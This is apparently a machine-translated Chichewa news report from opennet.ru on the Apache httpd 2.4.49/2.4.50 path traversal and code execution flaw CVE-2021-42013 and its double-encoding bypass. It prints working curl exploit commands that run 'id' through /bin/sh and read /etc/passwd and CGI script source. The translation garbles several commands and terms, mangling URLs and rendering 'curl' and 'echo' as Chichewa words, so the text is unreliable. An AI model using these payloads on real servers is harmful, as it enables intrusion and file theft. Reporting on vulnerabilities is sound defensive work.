Vector yatsopano yowukira yapezeka pa seva ya Apache http, yomwe idakhalabe yosakonzedwa posintha 2.4.50 ndipo imalola mwayi wofikira mafayilo kuchokera kumadera omwe ali kunja kwa chikwatu chamasamba. Kuonjezera apo, ochita kafukufuku apeza njira yomwe imalola, pamaso pa zoikidwiratu zina zosavomerezeka, osati kungowerenga mafayilo amtundu, komanso kuti azichita patali code yawo pa seva. Vutoli limangowoneka muzotulutsa 2.4.49 ndi 2.4.50; Mabaibulo akale samakhudzidwa. Kuti athetse chiwopsezo chatsopanocho, Apache httpd 2.4.51 idatulutsidwa mwachangu.
Pachimake, vuto latsopano (CVE-2021-42013) ndilofanana kwathunthu ndi chiwopsezo choyambirira (CVE-2021-41773) mu 2.4.49, kusiyana kokhako ndikuyika kosiyana kwa zilembo za "..". Makamaka, pakumasulidwa kwa 2.4.50 kuthekera kogwiritsa ntchito mndandanda wa "% 2e" kuyika mfundo kunatsekedwa, koma kuthekera kwa kabisidwe kawiri kunaphonya - pofotokoza za "%% 32% 65", seva idayiyika. kulowa "%2e" kenako kulowa ".", i.e. zilembo za "../" zopita ku chikwatu chapitacho zitha kusungidwa ngati ".%%32%65/".
Ponena za kupezerapo mwayi pachiwopsezo pogwiritsa ntchito ma code, izi ndizotheka pamene mod_cgi yayatsidwa ndipo njira yoyambira imagwiritsidwa ntchito momwe kugwiritsidwira ntchito kwa CGI script kumaloledwa (mwachitsanzo, ngati malangizo a ScriptAlias wayatsidwa kapena mbendera ya ExecCGI yafotokozedwa mu Njira malangizo). Chofunikira kuti chiwonongeko chichitike bwino ndikupatseni mwayi wopeza mafayilo omwe ali ndi mafayilo, monga / bin, kapena mwayi wofikira muzu wamafayilo "/" pazokonda za Apache. Popeza kuti mwayi woterewu sunaperekedwe, kuwukira kwa ma code sikumagwira ntchito kwenikweni pamakina enieni.
Panthawi imodzimodziyo, kuukira kuti mupeze zomwe zili m'mafayilo osakanikirana ndi malemba amtundu wa malemba a pa intaneti, omwe amawerengedwa ndi wogwiritsa ntchito yomwe seva ya http ikuyendetsa, imakhalabe yoyenera. Kuti muchite izi, ndikwanira kukhala ndi chikwatu patsamba lokhazikitsidwa pogwiritsa ntchito malangizo a "Alias" kapena "ScriptAlias" (DocumentRoot siyokwanira), monga "cgi-bin".
Chitsanzo cha ntchito yomwe imakupatsani mwayi wogwiritsa ntchito "id" pa seva: curl 'http://192.168.0.1/cgi-bin/.%%32%65/.%%32%65/.%% 32%65/.%% 32%65/.%%32%65/bin/sh' —data 'echo Content-Type: text/plain; kulira; id' uid=1(daemon) gid=1(daemon) magulu=1(daemon)
Chitsanzo cha zochitika zomwe zimakulolani kuti muwonetse zomwe zili mu / etc / passwd ndi imodzi mwa zolemba za intaneti (kuti mutulutse script code, chikwatu chomwe chimatanthauzidwa kudzera mu "Alias" malangizo, omwe script sakugwira ntchito, iyenera kufotokozedwa. monga chikwatu choyambira): kupindika 'http://192.168.0.1 .32/cgi-bin/.%%65%32/.%%65%32/.%%65%32/.%%65%32/.%. %65%192.168.0.1/etc/passwd' curl 'http: //32/aliaseddir/.%%65%32/.%%65%32/.%%65%32/.%%65%32/. %%65%2/usr/local/apacheXNUMX/cgi -bin/test.cgi'
Vutoli limakhudza kwambiri magawo omwe akusinthidwa mosalekeza monga Fedora, Arch Linux ndi Gentoo, komanso madoko a FreeBSD. Maphukusi omwe ali m'nthambi zokhazikika zamagawo okhazikika a seva Debian, RHEL, Ubuntu ndi SUSE sakhudzidwa ndi chiopsezo. Vuto silimachitika ngati mwayi wopita kumakanema ukakanidwa mwachindunji pogwiritsa ntchito "mafunika onse akanidwa".
Source: opennet.ru